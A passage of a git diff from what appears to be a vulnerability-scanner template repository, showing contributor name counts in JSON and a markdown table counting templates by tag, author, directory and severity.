(digisec360)","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"mukundbhuva","count":1},{"name":"retr02332","count":1},{"name":"breno_css","count":1},{"name":"shreyapohekar","count":1},{"name":"zinminphy0","count":1},{"name":"s1r1us","count":1},{"name":"bugvsme","count":1},{"name":"j33n1k4","count":1},{"name":"gboddin","count":1},{"name":"hczdmr","count":1},{"name":"barthy.koeln","count":1},{"name":"h4kux","count":1},{"name":"juliosmelo","count":1},{"name":"ringo","count":1},{"name":"udinchan","count":1},{"name":"orpheus","count":1},{"name":"b4uh0lz","count":1},{"name":"pdp","count":1},{"name":"deena","count":1},{"name":"mr. bobo hp","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"yaser_s","count":1},{"name":"httpvoid","count":1},{"name":"ohlinge","count":1},{"name":"hotpot","count":1},{"name":"kiransau","count":1},{"name":"vinit989","count":1},{"name":"kareemse1im","count":1},{"name":"blckraven","count":1},{"name":"becivells","count":1},{"name":"0xh7ml","count":1},{"name":"sickwell","count":1},{"name":"borna nematzadeh","count":1},{"name":"schniggie","count":1},{"name":"kiks7","count":1},{"name":"act1on3","count":1},{"name":"irshadahamed","count":1},{"name":"imhunterand","count":1},{"name":"noah @thesubtlety","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"ipanda","count":1},{"name":"caon","count":1},{"name":"ling","count":1},{"name":"qlkwej","count":1},{"name":"thebinitghimire","count":1},{"name":"zsusac","count":1},{"name":"allenwest24","count":1},{"name":"mayankpandey01","count":1},{"name":"freakyclown","count":1},{"name":"ramondunker","count":1},{"name":"mass0ma","count":1},{"name":"alexrydzak","count":1},{"name":"regala_","count":1},{"name":"wlayzz","count":1},{"name":"mariam tariq","count":1},{"name":"s1r1u5_","count":1},{"name":"daviey","count":1},{"name":"clment cruchet","count":1},{"name":"toufik-airane","count":1},{"name":"willd96","count":1},{"name":"_c0wb0y_","count":1},{"name":"bjxsec","count":1},{"name":"0xceeb","count":1},{"name":"vikas kundu","count":1},{"name":"adnanekhan","count":1},{"name":"geraldino2","count":1},{"name":"ilovebinbash","count":1},{"name":"tea","count":1},{"name":"dabla","count":1},{"name":"affix","count":1},{"name":"droberson","count":1},{"name":"realexp3rt","count":1},{"name":"dawid-czarnecki","count":1},{"name":"lbb","count":1},{"name":"mlec","count":1},{"name":"whynotke","count":1},{"name":"matt miller","count":1},{"name":"berkdusunur","count":1},{"name":"lethargynavigator","count":1},{"name":"nerrorsec","count":1},{"name":"technicaljunkie","count":1},{"name":"drfabiocastro","count":1},{"name":"k3rwin","count":1},{"name":"millermedia","count":1},{"name":"vzamanillo","count":1},{"name":"w0tx","count":1},{"name":"hakluke","count":1},{"name":"thelicato","count":1},{"name":"pudsec","count":1},{"name":"revblock","count":1},{"name":"numan türle","count":1},{"name":"tehtbl","count":1},{"name":"soyelmago","count":1},{"name":"bjhulst","count":1},{"name":"jas37","count":1},{"name":"furkansenan","count":1},{"name":"philippdelteil","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"rotemreiss","count":1},{"name":"knassar702","count":1},{"name":"ofjaaah","count":1},{"name":"charanrayudu","count":1},{"name":"natto97","count":1},{"name":"liquidsec","count":1},{"name":"mrcl0wnlab","count":1},{"name":"yavolo","count":1},{"name":"miryangjung","count":1},{"name":"adilsoybali","count":1},{"name":"floriandewald","count":1},{"name":"ahmed sherif","count":1},{"name":"shelld3v","count":1},{"name":"sinsinology","count":1},{"name":"arjunchandarana","count":1},{"name":"sicksec","count":1},{"name":"francescocarlucci","count":1},{"name":"marcos_iaf","count":1},{"name":"mah3sec_","count":1},{"name":"paper-pen","count":1},{"name":"tirtha_mandal","count":1},{"name":"rotembar","count":1},{"name":"jcockhren","count":1},{"name":"patrick pirker","count":1},{"name":"youngpope","count":1},{"name":"1337kro","count":1},{"name":"notsoevilweasel","count":1},{"name":"lark lab","count":1},{"name":"esonhugh","count":1},{"name":"evan rubinstien","count":1},{"name":"jacalynli","count":1},{"name":"evolutionsec","count":1},{"name":"skylark-lab","count":1},{"name":"0xceba","count":1},{"name":"manuelbua","count":1},{"name":"akash.c","count":1},{"name":"fopina","count":1},{"name":"arall","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"amirmsafari","count":1},{"name":"yusakie","count":1},{"name":"lingtren","count":1},{"name":"brabbit10","count":1},{"name":"salts","count":1},{"name":"colbyjack1134","count":1},{"name":"dali","count":1},{"name":"r3nz0","count":1},{"name":"jbaines-r7","count":1},{"name":"zeyad azima","count":1},{"name":"juicypotato1","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"retr0","count":1},{"name":"ok_bye_now","count":1},{"name":"_darrenmartyn","count":1},{"name":"akshansh","count":1},{"name":"ky9oss","count":1},{"name":"ola456","count":1},{"name":"shivanshkhari","count":1},{"name":"absshax","count":1},{"name":"jteles","count":1},{"name":"kailashbohara","count":1},{"name":"elouhi","count":1},{"name":"furkansayim","count":1},{"name":"invisiblethreat","count":1},{"name":"0xd0ff9","count":1},{"name":"momen eldawakhly","count":1},{"name":"pepitoh","count":1},{"name":"rubina119","count":1},{"name":"harshinsecurity","count":1},{"name":"jeya.seelan","count":1},{"name":"aresx","count":1},{"name":"manasmbellani","count":1},{"name":"amnotacat","count":1},{"name":"shivampand3y","count":1},{"name":"adamparsons","count":1},{"name":"kaizensecurity","count":1},{"name":"erethon","count":1},{"name":"kr1shna4garwal","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ayadi","count":1},{"name":"aravind","count":1},{"name":"viondexd","count":1},{"name":"bartu utku sarp","count":1},{"name":"nobody","count":1},{"name":"guax1","count":1},{"name":"duty_1g","count":1},{"name":"mesaglio","count":1},{"name":"udyz","count":1},{"name":"micha3lb3n","count":1},{"name":"infosecsanyam","count":1},{"name":"mubassirpatel","count":1},{"name":"thabisocn","count":1},{"name":"patralos","count":1},{"name":"jfbes","count":1},{"name":"ph33rr","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"bywalks","count":1},{"name":"exploitation","count":1},{"name":"rumble773","count":1},{"name":"lrtk-coder","count":1},{"name":"ldionmarcil","count":1},{"name":"galoget","count":1},{"name":"zn9988","count":1},{"name":"carlosvieira","count":1},{"name":"jbertman","count":1},{"name":"mantissts","count":1},{"name":"mbmy","count":1},{"name":"ruppde","count":1},{"name":"2rs3c","count":1},{"name":"brianlam38","count":1},{"name":"flag007","count":1},{"name":"spac3wh1te","count":1},{"name":"compr00t","count":1},{"name":"metascan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"andirrahmani1","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"hazana","count":1},{"name":"fq_hsu","count":1},{"name":"ransomsec","count":1},{"name":"0xtavian","count":1},{"name":"houdinis","count":1},{"name":"carrot2","count":1},{"name":"kagamigawa","count":1},{"name":"aron molnar","count":1},{"name":"ahmetpergamum","count":1},{"name":"palanichamy_perumal","count":1},{"name":"y0no","count":1},{"name":"christianpoeschl","count":1},{"name":"izn0u","count":1},{"name":"open-sec","count":1},{"name":"petruknisme","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rschio","count":1},{"name":"jc175","count":1},{"name":"shiva (strobes security)","count":1},{"name":"usdag","count":1},{"name":"aayush vishnoi","count":1},{"name":"zandros0","count":1},{"name":"erikowen","count":1},{"name":"narluin","count":1},{"name":"calumjelrick","count":1},{"name":"opencirt","count":1},{"name":"nielsing","count":1},{"name":"djoevanka","count":1},{"name":"b0yd","count":1},{"name":"tim_koopmans","count":1},{"name":"fmunozs","count":1},{"name":"arliya","count":1},{"name":"igibanez","count":1},{"name":"c4sper0","count":1},{"name":"dhiyaneshdki","count":1},{"name":"jrolf","count":1},{"name":"danfaizer","count":1},{"name":"rojanrijal","count":1},{"name":"shiar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"sospiro","count":1},{"name":"pphuahua","count":1},{"name":"akokonunes","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"0xrod","count":1},{"name":"ndmalc","count":1},{"name":"chron0x","count":1},{"name":"elitebaz","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"f1she3","count":1},{"name":"sorrowx3","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"booboohq","count":1},{"name":"p-l-","count":1},{"name":"ramkrishna sawant","count":1},{"name":"jonathanwalker","count":1},{"name":"luqman","count":1},{"name":"rivalsec","count":1},{"name":"cookiehanhoan","count":1},{"name":"unkl4b","count":1},{"name":"th3.d1p4k","count":1},{"name":"intx0x80","count":1},{"name":"justmumu","count":1},{"name":"d0rkerdevil","count":1},{"name":"x6263","count":1},{"name":"unp4ck","count":1},{"name":"adrianmf","count":1},{"name":"sttlr","count":1},{"name":"0xcharan","count":1},{"name":"tangxiaofeng7","count":1},{"name":"secthebit","count":1},{"name":"1nf1n7y","count":1},{"name":"hardik-rathod","count":1},{"name":"hlop","count":1},{"name":"aaban solutions","count":1},{"name":"bad5ect0r","count":1},{"name":"iampritam","count":1},{"name":"higor melgaço","count":1},{"name":"screamy","count":1},{"name":"win3zz","count":1},{"name":"professorabhay","count":1},{"name":"nagli","count":1},{"name":"topscoder","count":1},{"name":"naglis","count":1},{"name":"aringo-bf","count":1},{"name":"thirukrishnan","count":1},{"name":"0ut0fb4nd","count":1},{"name":"failopen","count":1},{"name":"joaonevess","count":1},{"name":"dale clarke","count":1},{"name":"danigoland","count":1},{"name":"kresec","count":1},{"name":"godfatherorwa","count":1},{"name":"pratik khalane","count":1},{"name":"michael wedl","count":1},{"name":"th3r4id","count":1},{"name":"kabirsuda","count":1},{"name":"yashgoti","count":1},{"name":"osamahamad","count":1},{"name":"ahmed abou-ela","count":1},{"name":"viniciuspereiras","count":1},{"name":"pussycat0","count":1},{"name":"sshell","count":1},{"name":"lixts","count":1},{"name":"unblvr1","count":1},{"name":"couskito","count":1},{"name":"kurohost","count":1},{"name":"davidfegyver","count":1},{"name":"kchason","count":1},{"name":"chesterblue","count":1},{"name":"jeya seelan","count":1},{"name":"hexcat","count":1},{"name":"hanlaomo","count":1},{"name":"fpatrik","count":1},{"name":"keni0k","count":1},{"name":"axrk","count":1},{"name":"omarjezi","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"xeldax","count":1},{"name":"pbuff07","count":1},{"name":"co0nan","count":1},{"name":"cravaterouge","count":1},{"name":"luqmaan hadia","count":1},{"name":"jaimin gondaliya","count":1},{"name":"petergrifin","count":1},{"name":"yashanand155","count":1},{"name":"ledoubletake","count":1},{"name":"nuts7","count":1},{"name":"ynnirc","count":1},{"name":"luskabol","count":1},{"name":"sec_hawk","count":1},{"name":"noamrathaus","count":1},{"name":"qianbenhyu","count":1},{"name":"notwhy","count":1},{"name":"sak1","count":1},{"name":"yuansec","count":1},{"name":"hateshape","count":1},{"name":"alex","count":1},{"name":"un-fmunozs","count":1},{"name":"daffianfo","count":1},{"name":"pascalheidmann","count":1},{"name":"pry0cc","count":1},{"name":"jiheon-dev","count":1},{"name":"5up3r541y4n","count":1},{"name":"noobexploiter","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ooooooo_q","count":1},{"name":"aaronchen0","count":1},{"name":"nytr0gen","count":1},{"name":"none","count":1},{"name":"lamscun","count":1},{"name":"marcio mendes","count":1},{"name":"jaskaran","count":1},{"name":"_harleo","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"chetgan","count":1},{"name":"af001","count":1},{"name":"exceed","count":1},{"name":"official_blackhat13","count":1},{"name":"dmartyn","count":1},{"name":"b0rn2r00t","count":1},{"name":"phyr3wall","count":1},{"name":"whotwagner","count":1},{"name":"xshuden","count":1},{"name":"piyushchhiroliya","count":1},{"name":"am0nt31r0","count":1},{"name":"shockwave","count":1},{"name":"8authur","count":1},{"name":"hakimkt","count":1},{"name":"wabafet","count":1},{"name":"bughuntersurya","count":1}],"directory":[{"name":"http","count":6913},{"name":"file","count":312},{"name":"workflows","count":191},{"name":"network","count":131},{"name":"ssl","count":27},{"name":"javascript","count":21},{"name":"dns","count":17},{"name":"headless","count":11},{"name":"code","count":3},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3337},{"name":"high","count":1458},{"name":"medium","count":1439},{"name":"critical","count":919},{"name":"low","count":248},{"name":"unknown","count":34}],"types":[{"name":"file","count":312},{"name":"dns","count":18}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ee22b336c6..6b5633fce3 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,4032 +1,4909 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | -| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | -| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | -| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | -| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | -| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | -| osint | 675 | pdteam | 283 | dns | 17 | | | | | -| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | -| lfi | 614 | geeknik | 221 | code | 2 | | | | | -| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | -| misconfig | 562 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | -| rce | 534 | 0x_akoko | 179 | cves.json | 1 | | | | | -| packetstorm | 508 | princechaddha | 163 | | | | | | | -| cve2021 | 473 | gy741 | 154 | | | | | | | -| wpscan | 468 | sleepingbag945 | 132 | | | | | | | -| cve2022 | 458 | arafatansari | 119 | | | | | | | -| wp | 390 | tess | 109 | | | | | | | -| unauth | 347 | madrobot | 65 | | | | | | | -| authenticated | 323 | zzeitlin | 64 | | | | | | | -| file | 321 | idealphase | 63 | | | | | | | -| sqli | 294 | pdresearch | 62 | | | | | | | -| cve2023 | 292 | righettod | 59 | | | | | | | -| intrusive | 273 | akincibor | 59 | | | | | | | -| cve2020 | 254 | for3stco1d | 55 | | | | | | | -| kev | 249 | iamnoooob | 52 | | | | | | | -| token-spray | 242 | philippedelteil | 46 | | | | | | | -| top-200 | 215 | rootxharsh | 44 | | | | | | | -| config | 213 | gaurang | 42 | | | | | | | -| osint-social | 210 | edoardottt | 41 | | | | | | | -| oast | 208 | c-sh0 | 35 | | | | | | | -| | 195 | johnk3r | 34 | | | | | | | -| token | 194 | j4vaovo | 32 | | | | | | | -| default-login | 186 | adam crosser | 31 | | | | | | | -| login | 185 | luisfelipe146 | 31 | | | | | | | -| detect | 164 | ice3man | 28 | | | | | | | -| iot | 164 | pwnhxl | 25 | | | | | | | -| apache | 160 | organiccrap | 24 | | | | | | | -| cve2018 | 158 | hardik-solanki | 24 | | | | | | | -| cve2019 | 157 | harsh | 23 | | | | | | | -| joomla | 146 | techbrunchfr | 23 | | | | | | | -| network | 140 | ffffffff0x | 22 | | | | | | | -| malware | 131 | ctflearner | 21 | | | | | | | -| redirect | 127 | sullo | 18 | | | | | | | -| auth-bypass | 113 | cckuailong | 18 | | | | | | | -| cve2010 | 112 | parthmalhotra | 17 | | | | | | | -| files | 111 | lu4nx | 16 | | | | | | | -| cve2017 | 109 | rxerium | 16 | | | | | | | -| cms | 107 | shaikhyaser | 16 | | | | | | | -| ssrf | 107 | random-robbie | 16 | | | | | | | -| router | 105 | 0xpugazh | 16 | | | | | | | -| top-100 | 100 | pr3r00t | 15 | | | | | | | -| install | 95 | unapibageek | 15 | | | | | | | -| disclosure | 87 | sheikhrishad | 15 | | | | | | | -| devops | 86 | milo2012 | 14 | | | | | | | -| takeover | 75 | dogasantos | 14 | | | | | | | -| seclists | 73 | r3dg33k | 14 | | | | | | | -| fileupload | 71 | tenbird | 14 | | | | | | | -| oracle | 66 | sharath | 13 | | | | | | | -| oss | 65 | melbadry9 | 13 | | | | | | | -| cisco | 61 | theabhinavgaur | 13 | | | | | | | -| huntr | 59 | nullfuzz | 13 | | | | | | | -| adobe | 56 | 0ri2n | 13 | | | | | | | -| cve2015 | 56 | suman_kar | 12 | | | | | | | -| cve2016 | 55 | meme-lord | 12 | | | | | | | -| google | 54 | wdahlenb | 11 | | | | | | | -| tokens | 52 | cyllective | 11 | | | | | | | -| atlassian | 50 | elsfa7110 | 11 | | | | | | | -| ir | 48 | nadino | 10 | | | | | | | -| log4j | 46 | 0x240x23elu | 10 | | | | | | | -| vmware | 46 | alph4byt3 | 10 | | | | | | | -| tenable | 46 | random_robbie | 10 | | | | | | | -| logs | 46 | logicalhunter | 10 | | | | | | | -| osint-gaming | 45 | co5mos | 10 | | | | | | | -| debug | 44 | hackergautam | 10 | | | | | | | -| hackerone | 44 | emadshanab | 9 | | | | | | | -| vulhub | 44 | oppsec | 9 | | | | | | | -| aem | 44 | fabaff | 9 | | | | | | | -| c2 | 43 | olearycrew | 9 | | | | | | | -| jndi | 43 | momika233 | 9 | | | | | | | -| cve2014 | 43 | veshraj | 8 | | | | | | | -| osint-porn | 42 | zh | 8 | | | | | | | -| osint-hobby | 42 | iamthefrogy | 8 | | | | | | | -| plugin | 42 | noraj | 8 | | | | | | | -| generic | 41 | kazet | 8 | | | | | | | -| traversal | 40 | aashiq | 8 | | | | | | | -| springboot | 39 | _0xf4n9x_ | 8 | | | | | | | -| oa | 38 | mastercho | 8 | | | | | | | -| aws | 38 | irshad ahamed | 8 | | | | | | | -| kubernetes | 37 | that_juan_ | 8 | | | | | | | -| jira | 37 | divya_mudgal | 7 | | | | | | | -| deserialization | 37 | huta0 | 7 | | | | | | | -| cnvd | 37 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| listing | 36 | randomstr1ng | 7 | | | | | | | -| injection | 35 | nodauf | 7 | | | | | | | -| misc | 35 | amit-jd | 7 | | | | | | | -| osint-misc | 35 | harshbothra_ | 7 | | | | | | | -| php | 35 | tarunkoyalwar | 7 | | | | | | | -| microsoft | 31 | leovalcante | 7 | | | | | | | -| osint-tech | 31 | its0x08 | 7 | | | | | | | -| fuzz | 30 | caspergn | 7 | | | | | | | -| sap | 30 | techryptic (@tech) | 7 | | | | | | | -| osint-coding | 30 | bhutch | 7 | | | | | | | -| wp-theme | 28 | kophjager007 | 7 | | | | | | | -| gitlab | 28 | adamcrosser | 7 | | | | | | | -| k8s | 28 | dr_set | 7 | | | | | | | -| api | 27 | praetorian-thendrickson | 6 | | | | | | | -| cve2012 | 26 | justaacat | 6 | | | | | | | -| ssh | 26 | pathtaga | 6 | | | | | | | -| weaver | 25 | devang-solanki | 6 | | | | | | | -| proxy | 25 | forgedhallpass | 6 | | | | | | | -| firewall | 25 | puzzlepeaches | 6 | | | | | | | -| osint-business | 24 | imnightmaree | 6 | | | | | | | -| amazon | 24 | evan rubinstein | 6 | | | | | | | -| keys | 24 | xelkomy | 6 | | | | | | | -| osint-images | 24 | clem9669 | 6 | | | | | | | -| osint-shopping | 24 | megamansec | 6 | | | | | | | -| osint-finance | 24 | gitlab red team | 6 | | | | | | | -| manageengine | 24 | __fazal | 6 | | | | | | | -| zoho | 23 | ja1sh | 6 | | | | | | | -| cloud | 23 | pentest_swissky | 6 | | | | | | | -| lfr | 23 | podalirius | 5 | | | | | | | -| stored-xss | 23 | panch0r3d | 5 | | | | | | | -| dlink | 23 | robotshell | 5 | | | | | | | -| tomcat | 23 | r12w4n | 5 | | | | | | | -| admin | 22 | s0obi | 5 | | | | | | | -| printer | 21 | ganofins | 5 | | | | | | | -| ssl | 21 | joanbono | 5 | | | | | | | -| ecology | 21 | powerexploit | 5 | | | | | | | -| weblogic | 21 | prajiteshsingh | 5 | | | | | | | -| yonyou | 21 | shine | 5 | | | | | | | -| ibm | 21 | kh4sh3i | 5 | | | | | | | -| msf | 21 | andreluna | 5 | | | | | | | -| camera | 20 | vicrack | 5 | | | | | | | -| github | 20 | yanyun | 5 | | | | | | | -| cicd | 20 | defr0ggy | 5 | | | | | | | -| xxe | 20 | mr-xn | 5 | | | | | | | -| fortinet | 20 | e_schultze_ | 4 | | | | | | | -| grafana | 19 | ggranjus | 4 | | | | | | | -| rukovoditel | 19 | h1ei1 | 4 | | | | | | | -| dns | 19 | shankar acharya | 4 | | | | | | | -| citrix | 19 | tanq16 | 4 | | | | | | | -| struts | 19 | scent2d | 4 | | | | | | | -| jenkins | 19 | r3naissance | 4 | | | | | | | -| enum | 19 | lum8rjack | 4 | | | | | | | -| osint-music | 18 | incogbyte | 4 | | | | | | | -| wavlink | 18 | dadevel | 4 | | | | | | | -| android | 18 | 3th1c_yuk1 | 4 | | | | | | | -| ftp | 18 | wisnupramoedya | 4 | | | | | | | -| service | 18 | ice3man543 | 4 | | | | | | | -| cti | 17 | dolev farhi | 4 | | | | | | | -| cve2011 | 17 | nybble04 | 4 | | | | | | | -| nginx | 17 | arm!tage | 4 | | | | | | | -| cve2009 | 16 | binaryfigments | 3 | | | | | | | -| confluence | 16 | m4lwhere | 3 | | | | | | | -| backup | 16 | lark-lab | 3 | | | | | | | -| status | 16 | farish | 3 | | | | | | | -| ruijie | 16 | shifacyclewala | 3 | | | | | | | -| osint-blog | 16 | aringo | 3 | | | | | | | -| microweber | 16 | taielab | 3 | | | | | | | -| honeypot | 16 | arcc | 3 | | | | | | | -| jarm | 15 | whoever | 3 | | | | | | | -| cnvd2021 | 15 | ambassify | 3 | | | | | | | -| cve2008 | 15 | ph33r | 3 | | | | | | | -| zyxel | 15 | 0w4ys | 3 | | | | | | | -| js | 15 | vsh00t | 3 | | | | | | | -| hp | 15 | king-alexander | 3 | | | | | | | -| coldfusion | 15 | thomas_from_offensity | 3 | | | | | | | -| tongda | 15 | ekrause | 3 | | | | | | | -| magento | 15 | _generic_human_ | 3 | | | | | | | -| java | 15 | z3bd | 3 | | | | | | | -| seeyon | 15 | lucky0x0d | 3 | | | | | | | -| rconfig | 15 | impramodsargar | 3 | | | | | | | -| mail | 15 | davidmckennirey | 3 | | | | | | | -| npm | 14 | xianke | 3 | | | | | | | -| bypass | 14 | emenalf | 3 | | | | | | | -| woocommerce | 14 | parth | 3 | | | | | | | -| icewarp | 14 | fxploit | 3 | | | | | | | -| osint-art | 14 | fyoorer | 3 | | | | | | | -| audit | 14 | vagnerd | 3 | | | | | | | -| domainmod | 14 | mavericknerd | 3 | | | | | | | -| login-check | 14 | johnjhacking | 3 | | | | | | | -| creds-stuffing | 14 | e1a | 3 | | | | | | | -| jboss | 14 | sushantkamble | 3 | | | | | | | -| dell | 14 | lucasljm2001 | 3 | | | | | | | -| azure | 14 | jarijaas | 3 | | | | | | | -| nodejs | 14 | badboycxcc | 3 | | | | | | | -| alibaba | 14 | matt galligan | 3 | | | | | | | -| osint-health | 14 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 14 | atomiczsec | 3 | | | | | | | -| vpn | 13 | bernardofsr | 3 | | | | | | | -| rails | 13 | heeress | 3 | | | | | | | -| backdoor | 13 | imjust0 | 3 | | | | | | | -| laravel | 13 | f1tz | 3 | | | | | | | -| auth | 13 | huowuzhao | 3 | | | | | | | -| abstractapi | 13 | alifathi-h1 | 3 | | | | | | | -| fortigate | 13 | evergreencartoons | 3 | | | | | | | -| ruby | 13 | true13 | 3 | | | | | | | -| setup | 13 | yuzhe-zhang-0 | 3 | | | | | | | -| cuppa | 13 | canberbamber | 3 | | | | | | | -| osint-dating | 13 | k0pak4 | 3 | | | | | | | -| osint-political | 13 | cheesymoon | 3 | | | | | | | -| file-upload | 13 | hahwul | 3 | | | | | | | -| sonicwall | 13 | unstabl3 | 3 | | | | | | | -| airflow | 13 | andydoering | 3 | | | | | | | -| netsweeper | 12 | swissky | 3 | | | | | | | -| zimbra | 12 | randomrobbie | 3 | | | | | | | -| git | 12 | skeltavik | 3 | | | | | | | -| javascript | 12 | me9187 | 3 | | | | | | | -| netgear | 12 | dr0pd34d | 3 | | | | | | | -| kafka | 12 | dudez | 3 | | | | | | | -| webserver | 12 | splint3r7 | 3 | | | | | | | -| dashboard | 12 | supr4s | 2 | | | | | | | -| graphql | 12 | ehsahil | 2 | | | | | | | -| drupal | 12 | dbrwsky | 2 | | | | | | | -| redis | 12 | 666asd | 2 | | | | | | | -| phpmyadmin | 11 | hetroublemakr | 2 | | | | | | | -| osint-video | 11 | h0j3n | 2 | | | | | | | -| fastjson | 11 | c3l3si4n | 2 | | | | | | | -| prestashop | 11 | j3ssie | 2 | | | | | | | -| docker | 11 | convisoappsec | 2 | | | | | | | -| jolokia | 11 | ree4pwn | 2 | | | | | | | -| online-fire-reporting | 11 | ricardo maia (brainfork) | 2 | | | | | | | -| xstream | 11 | uomogrande | 2 | | | | | | | -| headless | 11 | luci | 2 | | | | | | | -| spring | 11 | mohammedsaneem | 2 | | | | | | | -| node | 11 | d4vy | 2 | | | | | | | -| ssti | 11 | 0xnirvana | 2 | | | | | | | -| glpi | 10 | 0xsmiley | 2 | | | | | | | -| thinkphp | 10 | geekby | 2 | | | | | | | -| db | 10 | danielmofer | 2 | | | | | | | -| prometheus | 10 | 0xcrypto | 2 | | | | | | | -| smtp | 10 | bing0o | 2 | | | | | | | -| digitalocean | 10 | kishore-hariram | 2 | | | | | | | -| zabbix | 10 | wa1tf0rme | 2 | | | | | | | -| installer | 10 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| symfony | 10 | kre80r | 2 | | | | | | | -| elasticsearch | 10 | redteambrasil | 2 | | | | | | | -| windows | 10 | y4er | 2 | | | | | | | -| sitecore | 10 | cckuakilong | 2 | | | | | | | -| solarview | 10 | notnotnotveg | 2 | | | | | | | -| django | 10 | afaq | 2 | | | | | | | -| dedecms | 10 | pxmme1337 | 2 | | | | | | | -| hikvision | 9 | vavkamil | 2 | | | | | | | -| gitea | 9 | mzack9999 | 2 | | | | | | | -| vcenter | 9 | brucelsone | 2 | | | | | | | -| secret | 9 | foulenzer | 2 | | | | | | | -| wso2 | 9 | sbani | 2 | | | | | | | -| jetbrains | 9 | zomsop82 | 2 | | | | | | | -| versa | 9 | 0xsapra | 2 | | | | | | | -| cnvd2020 | 9 | myztique | 2 | | | | | | | -| kube | 9 | parzival | 2 | | | | | | | -| firebase | 9 | 8arthur | 2 | | | | | | | -| iis | 9 | k11h-de | 2 | | | | | | | -| opencats | 9 | shelled | 2 | | | | | | | -| pfsense | 9 | coldfish | 2 | | | | | | | -| bitbucket | 9 | dahse89 | 2 | | | | | | | -| cache | 9 | rafaelwdornelas | 2 | | | | | | | -| solr | 9 | gal nagli | 2 | | | | | | | -| sangfor | 9 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| scada | 9 | dogancanbakir | 2 | | | | | | | -| druid | 9 | gtrrnr | 2 | | | | | | | -| emerge | 8 | mrharshvardhan | 2 | | | | | | | -| manager | 8 | nvn1729 | 2 | | | | | | | -| console | 8 | z0ne | 2 | | | | | | | -| default-page | 8 | brenocss | 2 | | | | | | | -| cisco-switch | 8 | clarkvoss | 2 | | | | | | | -| symantec | 8 | 6mile | 2 | | | | | | | -| metadata | 8 | paperpen | 2 | | | | | | | -| exchange | 8 | nkxxkn | 2 | | | | | | | -| vbulletin | 8 | bp0lr | 2 | | | | | | | -| crlf | 8 | moritz nentwig | 2 | | | | | | | -| bucket | 8 | socketz | 2 | | | | | | | -| mirai | 8 | israel comazzetto dos reis | 2 | | | | | | | -| recon | 8 | smaranchand | 2 | | | | | | | -| oauth | 8 | maximus decimus | 2 | | | | | | | -| atom | 8 | gevakun | 2 | | | | | | | -| moodle | 8 | thardt-praetorian | 2 | | | | | | | -| hms | 8 | 0xrudra | 2 | | | | | | | -| e-office | 8 | dheerajmadhukar | 2 | | | | | | | -| ognl | 8 | x1m_martijn | 2 | | | | | | | -| unauthenticated | 8 | korteke | 2 | | | | | | | -| osint-news | 8 | martincodes-de | 2 | | | | | | | -| config-audit | 8 | sy3omda | 2 | | | | | | | -| spotweb | 8 | joshlarsen | 2 | | | | | | | -| wanhu | 7 | ep1csage | 2 | | | | | | | -| ofbiz | 7 | raesene | 2 | | | | | | | -| gogs | 7 | 0xelkomy | 2 | | | | | | | -| sophos | 7 | sascha brendel | 2 | | | | | | | -| ivanti | 7 | hackerarpan | 2 | | | | | | | -| vms | 7 | ajaysenr | 2 | | | | | | | -| filemanager | 7 | lotusdll | 2 | | | | | | | -| artica | 7 | sinkettu | 2 | | | | | | | -| ruckus | 7 | manas_harsh | 2 | | | | | | | -| pmb | 7 | w4cky_ | 2 | | | | | | | -| blind | 7 | supras | 2 | | | | | | | -| moodating | 7 | codexlynx | 2 | | | | | | | -| nacos | 7 | nuk3s3c | 2 | | | | | | | -| nagios | 7 | thevillagehacker | 2 | | | | | | | -| go | 7 | kiblyn11 | 2 | | | | | | | -| dropbox | 7 | udit_thakkur | 2 | | | | | | | -| solarwinds | 7 | n-thumann | 2 | | | | | | | -| fortios | 7 | paradessia | 2 | | | | | | | -| exploitdb | 7 | streetofhackerr007 | 2 | | | | | | | -| odoo | 7 | zy9ard3 | 2 | | | | | | | -| activemq | 7 | bananabr | 2 | | | | | | | -| ec2 | 7 | cocxanh | 2 | | | | | | | -| mobileiron | 7 | joshua rogers | 2 | | | | | | | -| shopify | 7 | github.com/its0x08 | 2 | | | | | | | -| huawei | 7 | amsda | 2 | | | | | | | -| bloofox | 7 | bsysop | 2 | | | | | | | -| websphere | 7 | florianmaak | 2 | | | | | | | 